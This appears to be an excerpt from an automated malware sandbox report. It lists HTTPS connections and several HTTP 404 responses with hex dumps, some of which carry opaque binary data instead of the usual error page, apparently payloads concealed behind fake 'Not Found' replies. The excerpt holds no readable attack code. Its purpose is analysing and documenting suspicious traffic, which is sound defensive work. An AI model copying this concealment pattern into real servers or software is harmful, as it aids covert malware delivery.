                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Mon, 17 Oct 2022 20:07:12 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-originExpect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7oALrIoAwhuoYZT%2FCbtR4LGHLUyRcnMhyng2odjyW3I1mQ2IExUezOq3VBgGDyEZAJ4IYG8DPAaOnJFnR9%2FqOqtQysIm9wQBNEQdv5MrRQjKadOdoSF%2BAbWG35g9A9Dwsw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7a89b2606d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 38 33 30 0d 0a 18 00 00 00 1f 3d 52 a8 37 66 30 7c 67 57 e9 d9 8c f4 ed 35 70 40 c7 45 89 0c 8a a1 00 37 cc 03 00 34 6f 8a 38 01 00 00 00 02 00 9e 03 00 00 73 d2 09 b6 c9 de db c5 ba 1e d7 7f 00 12 17 00 23 c9 75 21 7d 31 a2 02 6b a5 2d 41 ec 51 18 fa f8 e1 fc b7 d5 59 5e d9 fc 05 8a e6 2e b0 b3 25 e5 ea a7 6b bf aa d2 2a a1 30 2e 91 f4 d1 8f ea 9f c6 25 9c c5 89 09 cb 73 4a b2 26 d8 20 90 41 44 69 cf 7e 2f 45 4f d8 13 77 10 87 39 b4 bf 0f f7 e9 19 82 a7 10 b1 d7 19 1a 19 6a 33 fc 4e ec 20 86 9f cf 03 46 7d f0 e6 e5 4f a4 db 03 b4 3f dc 6e 62 a8 cf d0 14 a1 8b 5a 40 bb 9c 22 79 f8 02 92 87 b6 85 0e 2a 26 b7 a0 50 44 13 d1 ad da 68 6b 16 86 cc 76 b9 cc c2 8b e1 c5 1a 29 ca ae 93 ea 2a 85 ed cb d3 f5 00 0b 8c 84 9b 73 73 ac 0e 89 cf 08 3b 19 e1 d1 18 0b 83 49 65 d5 bc a8 fb f8 75 ea 73 e5 36 e7 89 9e bc fc e0 93 9f 0e 30 e3 b1 93 95 97 a7 51 6e c6 76 98 34 61 81 b9 d4 29 1e 0b 48 34 51 ea a8 27 bd a7 d3 19 7b ba fb 14 37 89 40 35 c9 72 ce ff 7e 73 02 80 1d 34 a3 d6 d5 35 54 16 c0 8c 0b b9 9c 39 cc 5a 58 e4 72 4a e6 3d ac 59 3b f2 1d 17 db 53 f1 f9 f8 6d 3c cd 87 c5 4c 80 7e b9 38 2b 2b 80 c9 45 28 26 8c 39 c1 e6 f7 06 d2 9f 3e 54 78 a5 8f 04 e0 44 d8 60 ef b0 31 16 26 48 3c be 6d 48 19 5f 48 77 e4 60 01 bd 87 b0 1c 9d a1 16 f4 36 d8 35 bf ff c2 92 ea 11 27 67 98 42 42 9d 33 db ad c4 a3 26 8a 4b 66 21 d8 e8 f5 cb c5 74 47 a9 b2 e7 8c 03 31 86 6a da 0d d8 d6 c4 39 45 06 a7 92 40 bc b7 0c ee a1 e3 2d e7 7f ff 08 9e 1a e4 a2 39 f6 af eb 37 f9 22 7e d2 9a 52 2e a6 c0 ce 7d 15 3c f7 86 de a3 9b c7 d1 a6 f5 37 e4 1d 47 e4 a8 f1 e3 34 b5 9d 6b e1 c6 0f 1e c2 d1 4c 69 46 31 be 52 37 2a 13 f1 90 bb 5e 00 af bd cf d3 34 dc cd 26 20 32 30 1e 71 18 15 45 d5 f8 9e 0c 94 79 ea b4 f4 f6 da 66 24 c8 7b 72 72 58 6f 47 16 74 8a bd ad 34 13 13 7d 27 a1 79 5d b2 03 f1 af 97 4a cd 31 e2 5d d4 33 e6 16 91 9e fa ae ac e7 2e be bd 94 e8 0e d8 7b bc f4 e5 63 8c d4 89 47 d2 c8 81 4f 81 4f f3 55 43 56 9b 62 c8 4b 42 b3 0a f7 40 ec 9a 8a a3 0e c2 c8 6e 35 97 c7 a8 aa 86 3a 19 e2 ca 43 2a be 48 8a 79 b3 54 95 5f 47 Data Ascii: 3830=R7f0|gW5p@E74o8s#u!}1k-AQY^.%k*0.%sJ& ADi~/EOw9j3N F}O?nbZ@"y*&PDhkv)*ss;Ieus60Qnv4a)H4Q'{7@5r~s45T9ZXrJ
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KUWoAro4NNt%2FHkTq3NXBVoTYzm8%2Fc5LLM3XNqxMxxhWzGlP2mWwGy8%2Fre%2FGYHfNo4qfoNE4QxZycKeKjM1Podnv%2B%2FcIlHo%2FDXoXYR4HUb95MOqJYDxgqIybV2D7LZ2gXIw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7ab884306d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z0mKA1qbWJO5wreHynT1UWv99rf%2BjxZXEqsThzPL%2BLBuk37HPrPW9ovFsC7%2BmGyfv0XCZSD8y6VqrA%2BMt1YZ%2Brl2uie88lq3%2BVxy7uGGkCRmA85vMOZ9jXW4fOlPB1BQUQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7ac496c06d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 64 36 63 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 32 59 3e b0 2b c6 28 d9 87 96 d3 15 5b 05 0f d6 c0 97 ac f7 a5 3b e2 df 53 23 30 54 1f f5 09 16 5b 6c 32 60 d2 dd 6d 61 20 2a 85 19 69 f7 6b db bb b2 07 5a 83 a4 07 0d 99 17 c4 f8 7a 7c e1 66 a2 cc f8 83 61 34 77 70 36 f8 37 33 50 97 23 f5 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e c8 00 59 b9 c7 75 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e b7 f6 ff 78 f7 4a db c4 0d 13 13 a9 bf e1 92 24 18 4f c5 03 b1 c9 a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 7a d4 96 be 21 51 61 36 3c 35 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 4b 0e e5 0e 8c eb 7e 71 eb 90 d4 1a b0 d0 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 22 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 73 f0 cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d 57 7d 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 8d 9b de 8e 82 11 e8 e4 1f ac a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 6c e4 9b 1f d4 4c 6a 91 9c 17 0f f1 2c a8 af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 14 f2 8b 8b e1 72 5b d7 9c c4 c3 e0 2b 9d bf bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 Data Ascii: 7d6c`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*2Y>+([;S#0T[l2`ma *ikZz|fa4wp673P#p"XJ3Ob>!ZC:>YuSSQ*{~xJ$Oa~i~]DzN,z!Qa6<5|(kJk?a]V4l3l
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2j%2BG0TuBeEb%2B718l4IcNHqvsmb5%2FURQTJ2nlKZ%2BrZIAdPO59uvg1H%2BpCEnm9OYqyqPP8zwBWiwAu8zUiZ33Vjes1yVUcLLfR8ICZuLcJDKHOVKmpZaTP3nUUAf8b3nzzKg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7b5894a06d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FnEqIOUVgHkCA6dmPTX8MQA57DvXbCBz%2FkdAkHQGY31oDK%2FwrF38ZS4sSOWnaTH7aezykVmTzii76QS1MbfhqeAg7aj4VO2m%2FGG%2BXBc3fetrR%2BqU%2F2lkC8XPQqhokkbEWg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7b64a9c06d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qv76Zyv3DXqgduqpOT%2Fap6kb0AyM2NyxeEgH7VsxPdEZTPxUekzEzzcATGgBWTP%2FisMnu7pADkRp3bs8HC6Aw2d9m3TDB3endIm4DUQGiJGlz2bmhrK6pYVP2hK6BL3llg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7b72c0e06d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k5zlqtk%2F8xb1LLitUYEq85Pm83C0wQVr8uiIbjT6o%2BKE74AFyy3v5p9p7o5%2BVY9Gg0Kegac6YXfDb7n9q0lWHzholuQ%2FbC7cBYX4zn8%2BYv0Wq%2BUh%2FYvXasQsRzx0h2Hwpw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7b7ed3706d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 38 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4c cd 44 9f 05 85 a2 4e f2 7a a6 64 14 0e 63 bf 75 4a 61 94 5d 0d 0a Data Ascii: 28Uys/~(`:LDNzdcuJa]
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=s1v%2Bgx4MDe2nngZ9vJhRTJWiek%2BpWKZYyxOm0WJRASi81rbou8GGd%2F%2FeG26tujefQqKwWTxHJaHKHDha6hV1wZ4kH%2FgrGuq4WbkiHZJnCWTbb8WYeo1y3RI7b3EakRPZFA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7c00a9a06d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MH4T%2FMqff3N4OrHnnRMlaneafNnafTKCK3Vq2FjF2qz8fObhvZWeTjJTFrlpRqN31PS4KGh4yZIFW66%2FeexijRGYNTk8quehV%2F2jp1MVRy%2Bp4C6R2YVFzPcklcB5Kf12EQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7c439d906d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B34UVpqEQHKdsJgz9n2w%2FdDIj9mLcQhOn%2FWU9b8g3v8kE4PrQyGsCvL2kSD0gcLFVt2yH%2B9fzTkKoVPpyQ%2BqEhnggeuiw4PcSbsSJ3whOwsqss%2BejPa%2FDoThyuMxZ44Jsw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7c71f1f06d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 85 14 dd 51 d5 ff 13 b1 67 f2 25 48 16 22 e0 6a 0b 65 88 17 0a 03 6b de a0 81 8f d0 30 d1 76 64 5d 28 e2 0d 0a Data Ascii: 37Uys/~(u:RQg%H"jek0vd](
